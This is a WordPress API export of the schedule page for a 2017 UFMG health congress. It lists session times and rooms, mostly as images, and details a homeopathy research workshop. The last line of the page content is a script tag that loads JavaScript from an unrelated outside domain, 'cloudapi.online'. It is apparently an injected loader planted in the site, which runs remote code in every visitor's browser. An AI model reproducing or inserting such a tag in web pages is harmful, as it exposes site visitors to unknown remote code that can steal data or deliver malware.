{"id":21,"date":"2016-06-21T18:02:33","date_gmt":"2016-06-21T21:02:33","guid":{"rendered":"http:\/\/localhost\/wordpress\/wordpress\/?page_id=16"},"modified":"2017-08-29T11:00:50","modified_gmt":"2017-08-29T11:00:50","slug":"programacao","status":"publish","type":"page","link":"https:\/\/www.medicina.ufmg.br\/congressosaude\/programacao\/","title":{"rendered":"Programa\u00e7\u00e3o"},"content":{"rendered":"<h3>28\/08\/2017\u00a0|\u00a0Segunda-feira<\/h3>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">13h - Sal\u00e3o Nobre<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p>&nbsp;<\/p><br \/>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter size-full wp-image-649\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao1.png\" alt=\"\" width=\"1000\" height=\"287\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao1.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao1-300x86.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao1-768x220.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">14h \u00e0s 16h - Sal\u00e3o Nobre - Eixo Tem\u00e1tico 2<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img decoding=\"async\" class=\"aligncenter size-full wp-image-650\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao2.png\" alt=\"\" width=\"1000\" height=\"507\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao2.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao2-300x152.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao2-768x389.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><strong><br \/><br \/>\n<\/strong><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">16h \u00e0s 17h30 - CETES<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p>&nbsp;<\/p><br \/>\n<p><img decoding=\"async\" class=\"aligncenter size-full wp-image-651\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao3.png\" alt=\"\" width=\"1000\" height=\"337\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao3.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao3-300x101.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao3-768x259.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">18h - Sal\u00e3o Nobre <span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p>&nbsp;<\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-652\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao4.png\" alt=\"\" width=\"1000\" height=\"395\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao4.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao4-300x119.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao4-768x303.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<h3><\/h3>\n<h3>29\/08\/2017\u00a0|\u00a0Ter\u00e7a-feira<\/h3>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">8h - Em frente \u00e0 Biblioteca<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p>&nbsp;<\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-653\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao5.png\" alt=\"\" width=\"1000\" height=\"123\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao5.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao5-300x37.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao5-768x94.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">8h \u00e0s 9h30 - Sal\u00e3o Nobre - Eixo Tem\u00e1tico 1<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-654\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao6.png\" alt=\"\" width=\"1000\" height=\"299\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao6.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao6-300x90.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao6-768x230.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p>&nbsp;<\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">8h30 \u00e0s 11h30 - Labor\u00e1torio de Inform\u00e1tica - 6\u00ba Andar<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-655\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao7.png\" alt=\"\" width=\"1000\" height=\"135\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao7.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao7-300x41.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao7-768x104.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">8h \u00e0s 17h - Sala 268 - 2\u00ba andar<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-657\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao8.png\" alt=\"\" width=\"1000\" height=\"266\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao8.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao8-300x80.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao8-768x204.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">10h \u00e0s 12h - Sal\u00e3o Nobre - Eixo Tem\u00e1tico 2<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-658\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao9.png\" alt=\"\" width=\"1000\" height=\"435\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao9.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao9-300x131.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao9-768x334.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">10h30 \u00e0s 12h30 - CETES - Eixo Tem\u00e1tico 3<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-659\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao10.png\" alt=\"\" width=\"1000\" height=\"303\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao10.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao10-300x91.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao10-768x233.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">14h \u00e0s 16h - Sal\u00e3o Nobre - Eixo Tem\u00e1tico 1<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-660\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao11.png\" alt=\"\" width=\"1000\" height=\"339\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao11.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao11-300x102.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao11-768x260.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">16h \u00e0s 17h30 - Audit\u00f3rio do 4\u00ba andar - Eixo Tem\u00e1tico 1<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-661\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/proramacao12.png\" alt=\"\" width=\"1000\" height=\"257\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/proramacao12.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/proramacao12-300x77.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/proramacao12-768x197.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">16h \u00e0s 18h - Audit\u00f3rio 829 - 8\u00ba Andar<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-662\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao13.png\" alt=\"\" width=\"1000\" height=\"211\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao13.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao13-300x63.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao13-768x162.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">16h30 \u00e0s 18h - Sal\u00e3o Nobre - Eixo Tem\u00e1tico 3<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-663\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao14.png\" alt=\"\" width=\"1000\" height=\"251\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao14.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao14-300x75.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao14-768x193.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<h3><\/h3>\n<h3>30\/08\/2017\u00a0|\u00a0Quarta-feira<\/h3>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">8h \u00e0s 9h30 - Sal\u00e3o Nobre - Eixo Transversal<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-664\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao15.png\" alt=\"\" width=\"1000\" height=\"361\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao15.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao15-300x108.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao15-768x277.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">10h \u00e0s 12h - CETES - Eixo Tem\u00e1tico 2<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-666\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao16-1.png\" alt=\"\" width=\"1000\" height=\"399\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao16-1.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao16-1-300x120.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao16-1-768x306.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">10h \u00e0s 12h - Sala 166 - 1\u00ba andar<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-667\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao17.png\" alt=\"\" width=\"1000\" height=\"166\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao17.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao17-300x50.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao17-768x127.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><strong>Objetivo:<\/strong> Discutir m\u00e9todos de pesquisa cl\u00ednica em Homeopatia, especialmente ensaios cl\u00ednicos controlados.<\/p><br \/>\n<p><strong>P\u00fablico Alvo:<\/strong> Profissionais e estudantes da \u00e1rea da sa\u00fade interessados em realizar projetos de pesquisa cl\u00ednica, mestrado, doutorado ou p\u00f3s-doutorado com homeopatia.<\/p><br \/>\n<p><strong>Vagas:<\/strong> Ser\u00e3o ofertadas 30 vagas.<\/p><br \/>\n<p><strong>Crit\u00e9rios de sele\u00e7\u00e3o:<\/strong><br \/><br \/>\n1- Profissionais e estudantes da \u00e1rea da sa\u00fade que estejam inscritos no 4\u00ba Congresso.<br \/><br \/>\n2- Preencher formul\u00e1rio de inscri\u00e7\u00e3o no workshop. <a href=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/inscricao\/inscricao-workshop-pesquisa-clinica-em-homeopatia\/\" target=\"_blank\" rel=\"noopener\">Clique aqui<\/a> para acessar o formul\u00e1rio.<br \/><br \/>\n3- Ocorrendo mais de 30 inscri\u00e7\u00f5es, os 30 participantes ser\u00e3o selecionados pelo organizador do workshop atrav\u00e9s de an\u00e1lise do mini curr\u00edculo. Este ser\u00e1 enviado no ato do preenchimento do formul\u00e1rio de inscri\u00e7\u00e3o do workshop.<br \/><br \/>\n<\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">10h30 \u00e0s 12h30 - Audit\u00f3rio 4\u00ba Andar - Eixo Tem\u00e1tico 3<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-668\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao18.png\" alt=\"\" width=\"1000\" height=\"386\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao18.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao18-300x116.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao18-768x296.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">10h30 \u00e0s 16h40 - Sal\u00e3o Nobre<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-670\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao19.png\" alt=\"\" width=\"1000\" height=\"840\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao19.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao19-300x252.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao19-768x645.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">14h \u00e0s 16h - Audit\u00f3rio 4\u00ba andar<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p><\/p><br \/>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-671\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao20.png\" alt=\"\" width=\"1000\" height=\"312\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao20.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao20-300x94.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao20-768x240.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><br \/>\n<p><\/p><\/div><\/div>\n<div class=\"otw-sc-toggle\"><h3 class=\"toggle-trigger widget-title closed\">16h30 \u00e0s 18h30 - Audit\u00f3rio 4\u00ba andar<span class=\"icon\"><\/span><\/h3><div class=\"toggle-content\"><p> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-672\" src=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao21.png\" alt=\"\" width=\"1000\" height=\"459\" srcset=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao21.png 1000w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao21-300x138.png 300w, https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacao21-768x353.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/p><\/div><\/div>\n<p><a href=\"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-content\/uploads\/sites\/54\/2016\/06\/programacaocultural.pdf\" target=\"_blank\" rel=\"noopener\">Clique aqui<\/a> para ver a programa\u00e7\u00e3o cultural.<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>28\/08\/2017\u00a0|\u00a0Segunda-feira 29\/08\/2017\u00a0|\u00a0Ter\u00e7a-feira 30\/08\/2017\u00a0|\u00a0Quarta-feira Clique aqui para ver a programa\u00e7\u00e3o cultural.<\/p>\n","protected":false},"author":26,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-programacao.php","meta":{"footnotes":""},"class_list":["post-21","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-json\/wp\/v2\/pages\/21","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-json\/wp\/v2\/users\/26"}],"replies":[{"embeddable":true,"href":"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-json\/wp\/v2\/comments?post=21"}],"version-history":[{"count":89,"href":"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-json\/wp\/v2\/pages\/21\/revisions"}],"predecessor-version":[{"id":796,"href":"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-json\/wp\/v2\/pages\/21\/revisions\/796"}],"wp:attachment":[{"href":"https:\/\/www.medicina.ufmg.br\/congressosaude\/wp-json\/wp\/v2\/media?parent=21"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}